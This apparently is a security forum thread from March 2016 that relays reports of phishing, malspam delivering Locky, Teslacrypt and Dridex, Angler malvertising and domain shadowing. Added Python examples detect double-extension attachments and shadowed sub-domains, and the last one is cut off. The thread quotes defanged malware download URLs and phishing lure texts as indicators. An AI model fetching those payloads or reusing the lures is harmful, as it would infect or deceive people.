Apple Store Support Ticket #35652467 – Apple PHISH
- https://myonlinesecu...ple-phish-fail/
14 Mar 2016 - "An email pretending to come from 'App Store Billing #7221' <apple.id3627@ applemarketingpro .com> is one of the latest -phish- attempts to -steal- your Apple and bank/credit card details...

Screenshot: https://myonlinesecu...il-1024x625.png

The link in the email -if- you did copy & paste the link into a browser window -redirects- to another dyndns link where you would see a webpage looking like this where they want a lot of details and have gone to a lot of effort to validate the forms and stop obvious fake information being put in:
> https://myonlinesecu...nd-1024x557.png
The links behind the 'unsubscribe' and 'Click-here-to-view-our-privacy-policy' lead you to the Romanian Security Team forum. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."

applemarketingpro .com: 174.35.126.195: https://www.virustot...95/information/
 

:ph34r: :ph34r:   <_<


Edited by AplusWebMaster, 14 March 2016 - 12:56 PM.

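The posts above keep returning to one trick: a script or executable named like 0000783426.doc.js shows up as "0000783426.doc" when Windows hides known file extensions. The following is an added example (not code from the quoted blogs or from this thread) of a mail-gateway style check that classifies attachment names by the extension Windows would actually act on and flags a decoy document or image extension in front of it; the extension lists and the sample ZIP members are assumptions constructed for the example.

```python
"""Classify mail attachment names by the extension Windows really acts on."""
import io
import os
import re
import zipfile
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Extensions Windows runs on double-click. The thread names .exe and .js; the others
# are common script/executable types added here for completeness (assumption).
EXECUTABLE_EXTS = {".exe", ".js", ".jse", ".vbs", ".vbe", ".wsf", ".scr", ".com",
                   ".bat", ".cmd", ".pif", ".hta", ".cpl"}
# Extensions a recipient expects on a harmless document or picture (assumption).
DECOY_EXTS = {"doc", "docx", "xls", "xlsx", "pdf", "rtf", "txt",
              "jpg", "jpeg", "png", "gif", "bmp", "tif", "tiff"}


@dataclass(frozen=True)
class Verdict:
    name: str
    risk: str                  # "benign", "executable" or "disguised"
    real_ext: Optional[str]    # extension Explorer acts on, e.g. ".js"
    decoy_ext: Optional[str]   # document/image extension shown to the user, if any


def classify_attachment(name: str) -> Verdict:
    """Compare what a user with hidden extensions sees against what would run."""
    base = os.path.basename(name.replace("\\", "/")).strip()
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in EXECUTABLE_EXTS:
        return Verdict(base, "benign", ext or None, None)
    # With known extensions hidden, Explorer displays only `stem`. Take its last
    # token, splitting on the separators seen in these runs ('.', ',', space, '_', '-'),
    # so both "0000783426.doc" and "IMG_... JPG,jpeg" yield a decoy extension.
    tokens = [t for t in re.split(r"[.,\s_-]+", stem.lower()) if t]
    decoy = tokens[-1] if tokens and tokens[-1] in DECOY_EXTS else None
    return Verdict(base, "disguised" if decoy else "executable", ext, decoy)


def scan_names(names: Iterable[str]) -> List[Verdict]:
    """Keep only attachments that would execute; disguised ones sort first."""
    hits = [v for v in (classify_attachment(n) for n in names) if v.risk != "benign"]
    return sorted(hits, key=lambda v: (v.risk != "disguised", v.name))


def scan_zip_bytes(data: bytes) -> List[Verdict]:
    """Scan a ZIP attachment's member names without extracting anything."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return scan_names(n for n in zf.namelist() if not n.endswith("/"))


def build_sample_zip() -> bytes:
    """Constructed ZIP mimicking attachment names quoted in the thread (inert text members)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("0000783426.doc.js", "// inert placeholder, not the real script\n")
        zf.writestr("ICG8994683408.js", "// inert placeholder\n")
        zf.writestr("Invoice_ref-99527554.pdf", "placeholder document\n")
    return buf.getvalue()


if __name__ == "__main__":
    for v in scan_zip_bytes(build_sample_zip()):
        shown = v.name[:-len(v.real_ext)]  # what Explorer displays with extensions hidden
        extra = f" (decoy .{v.decoy_ext})" if v.decoy_ext else ""
        print(f"{v.risk:10} shown as {shown!r:28} actually {v.real_ext}{extra}")
```

The check is name-based only, so pair it with content inspection: the thread's JS droppers would still be flagged as "executable" even without a decoy extension, but a renamed binary inside a non-executable wrapper would not.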


#1676 AplusWebMaster


Posted 15 March 2016 - 06:06 AM

FYI...

Malvertising Campaign... Leads to Angler Exploit Kit/BEDEP
- http://blog.trendmic...ploit-kitbedep/
Updated Mar 15, 2016 - "A malvertising campaign related to the Angler Exploit Kit is currently targeting users in the United States and may have affected tens of thousands of users in the last 24 hours alone. Based on our monitoring, the malicious ads were delivered by a compromised-ad-network in various highly-visited mainstream websites, including news, entertainment, and political commentary sites. As of this writing, while the more popular portals appear to be no longer carrying the bad ad, the malvertising campaign is still ongoing and thus continues to put users at risk of downloading malware into their systems... Users and organizations are advised to make sure that they keep their applications and systems up-to-date with the latest security patches; Angler Exploit Kit is known to exploit vulnerabilities in Adobe Flash and Microsoft Silverlight, among others..."
(More detail at the trendmicro URL above.)

- https://blog.malware...top-publishers/
Mar 15, 2016 - "... on the weekend we witnessed a huge spike in malicious activity emanating out of two suspicious domains. Not only were there a lot of events, but they also included some very high profile publishers, which is something we haven’t seen in a while:
Publisher     Traffic (monthly)[1]
msn .com     1.3B
nytimes .com     313.1M
bbc .com     290.6M
aol .com     218.6M
my.xfinity .com 102.8M
nfl .com     60.7M
realtor .com     51.1M
theweathernetwork .com     43M
thehill .com     31.4M
newsweek .com     9.9M

1] Numbers pulled from SimilarWeb .com
... Rogue domains:
Domain Name: TRACKMYTRAFFIC .BIZ: 104.28.18.116: https://www.virustot...16/information/
104.28.19.116: https://www.virustot...16/information/
>> https://www.virustot...35230/analysis/
Domain Name: TALK915 .PW: 104.27.191.84: https://www.virustot...84/information/
104.27.190.84: https://www.virustot...84/information/
>> https://www.virustot...30128/analysis/
... On Sunday, when the attack really expanded, the Angler exploit kit was then used... Angler EK has gone through several changes lately, in its URI patterns but also in the landing page itself. It is also the only one to use a recently patched Silverlight vulnerability*... the actual malware payload in each of these attacks, chances are quite high that it would be one of the several strains of ransomware currently out there..."
* http://malware.dontn...-2016-0034.html
(More detail at the malwarebytes URL above.)
___

Fake 'Insufficient Funds' SPAM - JS malware leads to Teslacrypt
- https://myonlinesecu...-to-teslacrypt/
15 Mar 2016 -"... an email with the subject of 'Insufficient Funds Transaction ID:12719734' [random numbered]  coming from random names and email addresses with a zip attachment is another one from the current bot runs which downloads Teslacrypt... The email looks like:
From: Random names & email addresses
Date: Tue 15/03/2016 06:29
Subject: Insufficient Funds Transaction ID:12719734
Attachment: money_12719734.zip
    Dear Valued Customer,
    Your transaction 12719734 dated on 13/03/2016 4:24 PM was declined due to insufficient funds on your account.
    For more details please refer to the report enclosed.
    Thank you!


15 March 2016: money_12719734.zip: Extracts to: details_sESWjv.js
 | access_21202865.zip: Extracts to: details_AdbdeE.js - Current Virus total detections  [1] [2]:
.. MALWR [3] [4] shows a download of what looks like Teslacrypt from
 http ://giveitalltheresqq .com/80.exe?1 or http ://giveitalltheresqq .com/69.exe?1 VirusTotal [5] ...
... This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
1] https://www.virustot...sis/1458027607/

2] https://www.virustot...sis/1458027607/

3] https://malwr.com/an...WMzNGEyNDA0YTQ/
Hosts
54.175.175.52: https://www.virustot...52/information/
>> https://www.virustot...b9ca7/analysis/
>> https://www.virustot...13f7e/analysis/
107.180.50.183: https://www.virustot...83/information/

4] https://www.virustot...sis/1458027237/

5] https://www.virustot...sis/1458027237/
___

Fake 'my photo' SPAM - fake jpg malware
- https://myonlinesecu...ke-jpg-malware/
15 Mar 2016 - "... An email with the subject of 'photo,my photo,image,pic' pretending to come from lyle.house@ hotmail .co.uk (probably random addresses) with a zip attachment is another one from the current bot runs... The email looks like:
From: lyle.house@ hotmail .co.uk
Date: Tue 15/03/2016 10:52
Subject: photo,my photo,image,pic
Attachment: IMG_0024415_02-2016 JPG.zip
    photo Sent from my iPhone


The link behind photo goes to https ://www.dropbox .com/s/5eaj5qwy9yz3xmo/IMG_0024415_02-2016%20JPG.zip?dl=0  where a zip file is downloaded. I am unable to find an abuse report for dropbox to alert them...
15 March 2016: IMG_0024415_02-2016 JPG.zip: Extracts to: IMG_0024415_02-2016 JPG,jpeg.exe
 Current Virus total detections 4/57* MALWR** - The detections are inconclusive...
This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper jpg (image) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1458039815/
TCP connections
87.117.242.31: https://www.virustot...31/information/
13.107.4.50: https://www.virustot...50/information/

** https://malwr.com/an...TY5NTU0NTdiYmI/
Hosts
87.117.242.31
13.107.4.50

___

Fake 'Document Enclosed' SPAM - fake PDF malware
- https://myonlinesecu...ke-pdf-malware/
15 Mar 2016 - "... An email with the subject of 'Document Enclosed' pretending to come from Ka2521@ hotmail .co.uk with a zip attachment is another one from the current bot runs...

Screenshot: https://myonlinesecu...ed-1024x426.png

15 March 2016: INV.P10119.03.2016.XML.zip: Extracts to:  INV.P10119.03.2016.XML.PDF,.exe
  Current Virus total detections 4/57* which is the -same- malware as described in this other Malspam run**.
This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1458039815/
TCP connections
87.117.242.31
13.107.4.50


** https://myonlinesecu...ke-jpg-malware/
___

Fake 'Itinerary' SPAM - JS malware leads to Locky ransomware
- https://myonlinesecu...cky-ransomware/
15 Mar 2016 - "An email with the subject of 'Itinerary #13B0B450E' [random numbered] pretending to come from no-reply@ clicktravel .com  with a zip attachment is another one from the current bot runs which downloads Locky ransomware...

Screenshot: https://myonlinesecu...0E-1024x382.png

15 March 2016: Hotel-Fax-V004X3R8_4983252052512314320.zip: Extracts to: USH3121122904.js
 Current Virus total detections 5/57* - MALWR** shows a download of Locky ransomware from
 http ://flaxxup .com/87yg756f5.exe (VirusTotal 3/56***)... This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1458040913/

** https://malwr.com/an...Dg4Y2I4ODcyMzA/
Hosts
98.131.204.1: https://www.virustot....1/information/
51.254.181.122: https://www.virustot...22/information/

*** https://www.virustot...sis/1458039440/
TCP connections
37.139.27.52: https://www.virustot...52/information/
149.202.109.205: https://www.virustot...05/information/
___

Dropbox spreading malware via spoofed emails about orders – fake PDF malware
- https://myonlinesecu...ke-pdf-malware/
16 Mar 2016 - "... from these earlier malspam runs [1] [2] we now have a series of emails with the basic subject of 'orders' pretending to come from different companies with a -link- to Dropbox to download a zip attachment... another one from the current bot runs... The email looks like:
From: admin@ t-mobile .de
Date: Tue 15/03/2016 13:02
Subject: Fwd: INVOICE – Your Order from Sports
Attachment: 9937700846-001.PDF.zip
    Order Details
    Order Number: 31860 Date Ordered: Tuesday 15 March, 2016 Order In Progress If you have any questions or queries regarding your order please contact us


Some of the subjects and alleged senders seen so far include:
    'Fwd: INVOICE – Your Order from Sports' pretending to come from admin@ t-mobile .de
    'order 15/03/2016' pretending to come from benelle@ bt .com
    'Fwd: INVOICE – Your Order' pretending to come from wdcabs1@ gmail .com
All -three- of these emails have the -same- body content and the -same- link-to-Dropbox to download the malware https ://www.dropbox .com/s/gckssj2hhyrfo2u/9937700846-001.PDF.zip?dl=0
> https://myonlinesecu...re-1024x541.png
There are no abuse links or method of reporting malware, only to report DCMA and copyright infringements, by the tiny flag in bottom left corner...
15 March 2016: 9937700846-001.PDF.zip : Extracts to: 9937700846-001.PDF.exe
.. Current Virus total detections 5/56* which is exactly the -same- malware as described in the earlier malspam runs**... These are spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
1] https://myonlinesecu...ke-pdf-malware/

2] https://myonlinesecu...ke-jpg-malware/

* https://www.virustot...sis/1458046592/
TCP connections
87.117.242.31: https://www.virustot...31/information/
13.107.4.50: https://www.virustot...50/information/

** https://myonlinesecu...ke-jpg-malware/
___

Documents with malicious macros deliver fileless malware to financial-transaction systems
- http://www.csoonline...on-systems.html
Mar 14, 2016 - "Spammed Word documents with malicious macros have become a popular method of infecting computers over the past few months. Attackers are now taking it one step further by using such documents to deliver fileless malware that gets loaded directly in the computer's memory. Security researchers from Palo Alto Networks analyzed a recent attack campaign that pushed spam emails with malicious Word documents to business email addresses from the U.S., Canada and Europe... 'Due to the target-specific details contained within the spam emails and the use of memory-resident malware, this particular campaign should be treated as a high threat', the Palo Alto researchers said in a blog post*..."
* http://researchcente...-based-attacks/
Mar 11, 2016 - "... users should ensure that macros are -not- enabled by default and should be wary of opening -any- macros in files received from untrusted sources..."
 



Edited by AplusWebMaster, 15 March 2016 - 01:04 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
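Nearly every run in the post above relies on the same trick: an archive that extracts to a script, or a name such as 9937700846-001.PDF.exe or IMG_0024415_02-2016 JPG,jpeg.exe that reads as a document once Explorer hides the real extension. The following is an added example (not code from the post or from myonlinesecurity.co.uk) of a small name-based triage check a mail gateway or analyst script can run over attachment names and archive listings. The extension sets are my own assumptions; the sample names are the ones quoted in the post.

```python
import re
from typing import Dict, List

# Extensions Windows treats as directly executable. With "show known file
# extensions" turned off, Explorer hides the final extension, so a file named
# report.PDF.exe displays as "report.PDF" with whatever icon the binary carries.
# (Assumed set for this example; extend as needed.)
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse",
                   "vbs", "vbe", "wsf", "hta"}
# Extensions a recipient expects to be a harmless document or image.
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "jpeg", "png", "gif",
              "txt", "xml", "rtf"}
# Office formats that can carry macros (the "enable macros" lure in the posts).
MACRO_EXTS = {"doc", "dot", "xls", "xlt", "docm", "xlsm", "rtf"}
ARCHIVE_EXTS = {"zip", "rar", "7z"}


def attachment_risks(name: str) -> List[str]:
    """Return human-readable reasons an attachment name looks deceptive.

    Dots, commas and whitespace are all treated as separators so that names
    such as "IMG_0024415_02-2016 JPG,jpeg.exe" are seen as ending in .exe with
    a JPG/jpeg decoy in front of it.
    """
    tokens = [t for t in re.split(r"[.,\s]+", name.strip().lower()) if t]
    if len(tokens) < 2:
        return []
    final, inner = tokens[-1], tokens[:-1]
    decoys = [t for t in inner if t in DECOY_EXTS]
    risks: List[str] = []
    if final in EXECUTABLE_EXTS:
        risks.append(f"executable extension .{final}")
        if decoys:
            risks.append(f"decoy extension .{decoys[-1]} before .{final} (double extension)")
    elif final in MACRO_EXTS:
        risks.append(f"office document .{final} can carry macros")
    elif final in ARCHIVE_EXTS and decoys:
        # e.g. 9937700846-001.PDF.zip: the archive itself is named like a document
        risks.append(f"archive named like a .{decoys[-1]} file")
    return risks


def scan_archive(archive_name: str, members: List[str]) -> Dict[str, List[str]]:
    """Combine risks for an archive and every file it extracts to.

    Only names with at least one risk are returned, keyed by file name, so an
    empty dict means nothing in the listing looked deceptive by name alone.
    """
    findings: Dict[str, List[str]] = {}
    outer = attachment_risks(archive_name)
    if outer:
        findings[archive_name] = outer
    for member in members:
        member_risks = attachment_risks(member)
        if member_risks:
            findings[member] = member_risks
    return findings


if __name__ == "__main__":
    # Archive names and extracted names taken from the spam runs quoted above.
    samples = {
        "IMG_0024415_02-2016 JPG.zip": ["IMG_0024415_02-2016 JPG,jpeg.exe"],
        "INV.P10119.03.2016.XML.zip": ["INV.P10119.03.2016.XML.PDF,.exe"],
        "Hotel-Fax-V004X3R8_4983252052512314320.zip": ["USH3121122904.js"],
        "9937700846-001.PDF.zip": ["9937700846-001.PDF.exe"],
        "money_12719734.zip": ["details_sESWjv.js"],
    }
    for archive, members in samples.items():
        for fname, reasons in scan_archive(archive, members).items():
            print(f"{fname}: {'; '.join(reasons)}")
    print(attachment_risks("Sales Order Document for Emailing_140603632941_1752380.doc"))
```

Name checks like this are cheap and catch the icon-spoofing runs described in the post, but they say nothing about a plain .doc with a macro; that case is flagged only as "can carry macros" and still needs sandboxing or macro-blocking policy.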


#1677 AplusWebMaster

Posted 16 March 2016 - 06:33 AM

FYI...

Fake 'Your order' SPAM - doc malware delivers Dridex
- https://myonlinesecu...-macro-malware/
16 Mar 2016 - "An email saying 'Thank you for shopping with 365 Electrical' with the subject of 'Your order summary from 365 Electrical. Order number: 93602'  (random numbers) coming from random names and email addresses  with a malicious word doc attachment is another one from the current bot runs... The email looks like:
From: random names and email addresses
Date: Wed 16/03/2016 10:29
Subject: Your order summary from 365 Electrical. Order number: 93602
Attachment: Sales Order Document for Emailing_140603632941_1752380.doc
    Dear customer,
    Thank you for shopping with 365 Electrical. This is to acknowledge that we’ve received your order (see attached document). Please note that acceptance of your order takes place when the goods are loaded onto one of our vehicles for delivery to you.
    Your order number is 93602.
    Please read the following important information:
    Damaged Goods: Must be reported within 48 hours of delivery date with photographic evidence. Do not install any damaged or unwanted items. This counts as acceptance of goods and the item is then non-returnable and non-refundable.
    Delivery Timeslots: You must ensure that you can be available all day on your chosen day of delivery; if you find you cannot keep to the delivery date you must notify us before 12 noon one working day before...
    Thank you,
    365 Electrical


16 March 2016: Sales Order Document for Emailing_140603632941_1752380.doc - Current Virus total detections 1/57*
.. MALWR** shows a download from http ://api.holycrossservices .com/dri/donate.php which gave me
 crypted120med.exe (VirusTotal 4/56***). This looks like Dridex banking Trojan.. DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458123902/

** https://malwr.com/an...DE2ZWQyMGY2YTM/
Hosts
176.103.56.36
188.93.239.28
184.27.46.153


*** https://www.virustot...sis/1458124624/
TCP connections
188.93.239.28: https://www.virustot...28/information/
88.221.14.11: https://www.virustot...11/information/
___

Fake 'Unpaid Invoice' SPAM - doc macro malware
- https://myonlinesecu...-macro-malware/
16 Mar 2016 - "An email with the subject of 'Unpaid Invoice' pretending to come from Dave.Maule@ tiscali .co.uk ( probably random) with a malicious word doc attachment is another one from the current bot runs... The email looks like:
From: Dave.Maule@ tiscali .co.uk
Date: Wed 16/03/2016 11:08
Subject: Unpaid Invoice
Attachment: original invoice feb2016.doc
    I noticed that your invoice is overdue by 25 days and wanted to reach out to make sure that you received our original invoice and my reminder email on 02/16.
    You can pay us by CC, direct deposit or with a check.
    If you have any questions, please let us know and we’d be happy to respond.
    Warm Regards,
    A Cooper


16 March 2016: original invoice feb2016.doc -  Current Virus total detections 23/57*
.. Waiting for analysis. This is highly likely to download either Dridex banking Trojan or Locky ransomware... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458127451/
___

Fake 'Document1' SPAM - JS malware leads to Locky ransomware
- https://myonlinesecu...cky-ransomware/
16 Mar 2016 - "A -blank/empty- email with the subject of 'Document1' pretending to come from your own email address and sent to your own email address with a zip attachment is another one from the current bot runs which downloads Locky ransomware... The email looks like:
From: your own email address
Date: Wed 16/03/2016 11:58
Subject: Document1
Attachment: Document1.zip


Body content: totally -blank-

16 March 2016: Document1.zip: Extracts to: CDF6840557603.js - Current Virus total detections 5/57*
.. MALWR** shows a download of Locky ransomware from
 http ://winjoytechnologies .com/v4v5g45hg.exe (VirusTotal 1/56***) which is a -different- Locky binary from this earlier malspam run[1]... This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1458129749/

** https://malwr.com/an...jhiZGNmYzRjMTQ/
Hosts
192.185.37.228: https://www.virustot...28/information/
91.195.12.187: https://www.virustot...87/information/

*** https://www.virustot...sis/1458129716/
TCP connections
91.195.12.187

1] https://myonlinesecu...ridex-or-locky/
___

Fake 'Bestellung' SPAM - JS malware leads to ransomware
- https://myonlinesecu...ridex-or-locky/
16 Mar - "An email written partly in English -and- partly in German supposedly from Buhler group with the subject of 'Bestellung 69376' [random numbered] pretending to come from  david.favella654@ buhlergroup .com (-random- numbers after david.favella) with a zip attachment is another one from the current bot runs... Update: I am reliably informed this is Locky ransomware not Dridex... The email looks like:
From: david.favella654@ buhlergroup .com
Date: Wed 16/03/2016 10:03
Subject: Bestellung 69376
Attachment: Bestellung Bestellung 69376.zip
    Sehr geehrte Damen und Herren,
    anbei erhalten Sie unsere Bestellung. Diese ist maschinell erstellt und ist daher ohne Unterschrift gültig.
    Dear ladies and gentlemen,
    enclosed you receive our order. This order has been created automatically and is valid without signature.
    Mit freundlichen Grüßen / Best regards ...


16 March 2016: Bestellung Bestellung 69376.zip: Extracts to: BOY8641744807.js
 Current Virus total detections 6/57*.. MALWR** shows a download of Locky ransomware from
 http ://vital4age .eu/v4v5g45hg.exe (VirusTotal 0/57***).. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1458127067/

** https://malwr.com/an...TY0ZTFiMjhjMGM/
Hosts
85.13.152.231: https://www.virustot...31/information/
>> https://www.virustot...5f427/analysis/

*** https://www.virustot...sis/1458127276/
TCP connections
149.202.109.205: https://www.virustot...05/information/
91.195.12.187: https://www.virustot...87/information/
___

Fake 'Order status updated' SPAM - doc macro malware
- https://myonlinesecu...-macro-malware/
16 Mar 2016 - "An email with the subject of 'RE: MINERAL & FINANCIAL INVESTMENTS LTD – Order Number 89785/682352/15 status updated to order processing' pretending to come from random names and email addresses with a malicious word doc attachment is another one from the current bot runs... This mass malspam run has a subject that looks like 'RE: [random company name] – Order Number [random number] status updated to order processing'. The attachment names are based on the company name in the subject and include:
    CML MICROSYSTEMS – Order NUM. 09725_866338_23.doc
    MINERAL & FINANCIAL INVESTMENTS LTD – Order NUM. 57691_396874_45.doc
    MXC CAPITAL PLC – Order NUM. 80048_534442_26.doc
    ROSSETI JSC – Order NUM. 39475_569330_86.doc
Some subjects include:
    RE: MINERAL & FINANCIAL INVESTMENTS LTD – Order Number 89785/682352/15 status updated to order processing
    RE: CML MICROSYSTEMS – Order Number 09725/866338/23 status updated to order processing
    RE: ROSSETI JSC – Order Number 39475/569330/86 status updated to order processing
    RE: MXC CAPITAL PLC – Order Number 80048/534442/26 status updated to order processing
One example email looks like:
From: Horton.Elena9@ incrcc .org
Date: Wed 16/03/2016 13:34
Subject: RE: MINERAL & FINANCIAL INVESTMENTS LTD – Order Number 89785/682352/15 status updated to order processing
Attachment: MINERAL & FINANCIAL INVESTMENTS LTD – Order NUM. 57691_396874_45.doc
    Dear customer,
    First of all thank you for purchasing with us.
    We want to let you know that your order 89785/682352/15 status has been updated to ORDER PROCESSING
    If you have any questions about your order, send an email to sales@fromdomain qouting your order number 89785/682352/15 or simply reply to this message.
    Your unique reference: Your order number listed above.
    MINERAL & FINANCIAL INVESTMENTS LTD
    You can download and view a copy of your invoice from the attached document...


16 March 2016: MINERAL & FINANCIAL INVESTMENTS LTD – Order NUM. 57691_396874_45.doc
.. Current Virus total detections 1/57*..

Update: a resubmission to MALWR** got a download from http ://api.kairoshealthcare .org/dri/donate.php
which gave freshmeat.exe (VirusTotal 4/56***) which appears to be an -updated- Dridex binary although also using the same download locations from this earlier Malspam run[4]... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458134954/

** https://malwr.com/an...TJkN2ZmYzUzNGU/
Hosts
213.159.214.241: https://www.virustot...41/information/
188.93.239.28
13.107.4.50

*** https://www.virustot...sis/1458137759/
TCP connections
188.93.239.28: https://www.virustot...28/information/
>> https://www.virustot...b5c4b/analysis/
13.107.4.50: https://www.virustot...50/information/

4] https://myonlinesecu...-macro-malware/
___

Malvertising Attacks Targeting The UK
- https://blog.malware...rgeting-the-uk/
Mar 16, 2016 - "We recently stumbled upon a -malvertising- incident on a large British newspaper site which we decided to investigate in greater details. As with many attacks we have found lately, the line between legitimate advertisers and rogue ones is getting finer and finer. Indeed, in many cases ad networks simply cannot tell them apart without actual proof of malicious activity... Malvertising Flow:
    dailymail .co.uk
    adclick.g.doubleclick .net
    track.bridge .systems (Russian RTB?)
    cdn.exeterquads .com (Fake ad server)
    geraeuschvollste.ciderstore .co.uk (Angler EK landing)
At first sight, exeterquads .com looks like a legitimate business (which it is) located in the UK. However, the subdomain (the ‘cdn‘ preceding the main domain) was registered via criminals who managed to steal the registrant’s credentials in order to create a rogue URL that points to their own server. This is called 'domain shadowing'*.
Legitimate domain:
Hostname: exeterquads .com
IP address: 5.196.39.216
Running on: Microsoft-IIS/8.5
Rogue (shadowed) sub-domain:
Hostname: cdn.exeterquads .com
IP address: 5.63.145.76: https://www.virustot...76/information/
Running on: nginx/1.0.15
The crooks also -stole- the graphics from this legitimate business to create an ad banner which looks rather convincing but is meant to be a -decoy- for the real motivation behind this attack. Indeed, alongside the banner, an innocuous 1×1 pixel image is served (supposedly for tracking purposes). This is where 'fingerprinting' happens. The -rogue- code hiding in the image can be decoded to reveal a nefarious intent to identify real victims and eliminate those running security tools, the latter being of no interest to the criminals:
> https://blog.malware...016/03/flow.png
The final part of this rogue code is to launch the exploit kit URL, which for all these campaigns has been Angler EK. Because this campaign was aimed at people living in the UK, we searched for additional rogue advertisers abusing other businesses. We found quite a handful of them that have been used in recent attacks... one way to determine whether an advertiser is legit is by checking the domain info and seeing if there are any discrepancies between the main domain and sub-domain. Also, many of those rogue-subdomains use free-SSL-certificates, while the core domain doesn’t... The UK malvertising campaign is of a rather large size, just after the US one. We have also spotted specific campaigns targeting Canadians, Australians and the French with a similar modus operandi. The amount of work spent -forging- legitimate brands and advertising under such disguise is really astonishing. We managed to get in touch with one company whose brand had been abused and they clearly were none the wiser when asked whether they were aware of this ad banner residing on a sub-domain. However, they managed to find out the source of the problem once they talked with their hosting provider... This kind of attack is a reminder of just how many different ways a website can-be-compromised or leveraged to fulfill certain goals. It also shows how difficult it can be for ad networks to -vet- new customers and weed out malicious ones."
* https://www.proofpoi...he-Shadow-Knows
___

Cyber criminals snap up expired domains to serve malicious ads
- http://www.reuters.c...e-idUSKCN0WI2DZ
Mar 16, 2016 - "Expired domain names are becoming the latest route for cyber criminals to find their way into the computers of unsuspecting users. Cyber criminals launched a malicious advertising campaign this week targeting visitors of popular news and entertainment websites after gaining ownership of an expired web domain of an advertising company. Users visiting the websites of the New York Times, Newsweek, BBC and AOL, among others, may have installed malware on their computers if they clicked on the malicious ads. Bresntsmedia .com, the website used by -hacks- to serve up malware, expired on Jan. 1 and was registered again on March 6 by a different buyer, security researchers at Trustwave SpiderLabs wrote in a blog*. Buying the domain of a small but legitimate ad company provided the criminals with high quality traffic from popular web sites that publish their ads directly, or as affiliates of other ad networks, the researchers said... The researchers also found two more expired "media"-related domains - envangmedia .com and markets.shangjiamedia .com - used by the same cyber criminals. The people behind the campaign may be on keeping a watch for expired domains with the word "media" in them, they said."
* https://www.trustwav...to-New-Heights/

envangmedia .com: 136.243.149.196: https://www.virustot...96/information/
>> https://www.virustot...e221a/analysis/

markets.shangjiamedia .com: 136.243.149.201: https://www.virustot...01/information/
>> https://www.virustot...5b055/analysis/
 



Edited by AplusWebMaster, 16 March 2016 - 07:30 PM.

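The Malwarebytes excerpt above gives a practical tell for a shadowed sub-domain: the apex domain and the rogue sub-domain disagree on hosting (5.196.39.216 on Microsoft-IIS/8.5 versus 5.63.145.76 on nginx/1.0.15 for exeterquads .com) and the sub-domain often carries a free certificate the apex never had. The following is an added example (not Malwarebytes' code) that takes those per-host observations, which in practice you would collect with a DNS lookup, an HTTP HEAD request and a TLS handshake, and lists the discrepancies. The IPs and Server headers are the ones quoted in the post; the certificate issuer on the rogue host and the FREE_CERT_ISSUERS set are constructed assumptions for the example.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional


@dataclass
class HostProfile:
    """What a defender can collect for one hostname: the DNS answer, the HTTP
    Server header and, if the host serves HTTPS, the certificate issuer."""
    hostname: str
    ip: str
    server: str                        # value of the HTTP "Server" header
    cert_issuer: Optional[str] = None  # None when the host serves no HTTPS


# Issuers that hand out certificates at no cost. Assumed set for this example;
# extend it to whatever CAs matter in your environment.
FREE_CERT_ISSUERS = {"let's encrypt"}


def shadowing_indicators(apex: HostProfile, sub: HostProfile) -> List[str]:
    """Compare a sub-domain against its apex domain and list discrepancies of
    the kind the post describes. An empty list means nothing stood out, not
    that the sub-domain is clean."""
    if not sub.hostname.lower().endswith("." + apex.hostname.lower()):
        raise ValueError(f"{sub.hostname} is not a sub-domain of {apex.hostname}")

    indicators: List[str] = []

    # 1. Hosting: a sub-domain pointing at a different address is normal for
    #    CDNs, but a different /24 plus different server software is the
    #    combination seen in the shadowed case above.
    apex_ip, sub_ip = ip_address(apex.ip), ip_address(sub.ip)
    if apex_ip != sub_ip:
        apex_net = ip_network(f"{apex.ip}/24", strict=False)
        where = "same /24" if sub_ip in apex_net else "different /24"
        indicators.append(
            f"{sub.hostname} resolves to {sub.ip}, apex to {apex.ip} ({where})")

    # 2. Server software: compare the product name only, not the version.
    apex_sw = apex.server.split("/")[0].strip().lower()
    sub_sw = sub.server.split("/")[0].strip().lower()
    if apex_sw != sub_sw:
        indicators.append(
            f"server software differs: apex {apex.server}, sub-domain {sub.server}")

    # 3. TLS: HTTPS only on the sub-domain, or a free CA only on the sub-domain.
    if sub.cert_issuer and not apex.cert_issuer:
        indicators.append("sub-domain serves HTTPS while the apex domain does not")
    if sub.cert_issuer and sub.cert_issuer.lower() in FREE_CERT_ISSUERS \
            and (apex.cert_issuer or "").lower() not in FREE_CERT_ISSUERS:
        indicators.append(
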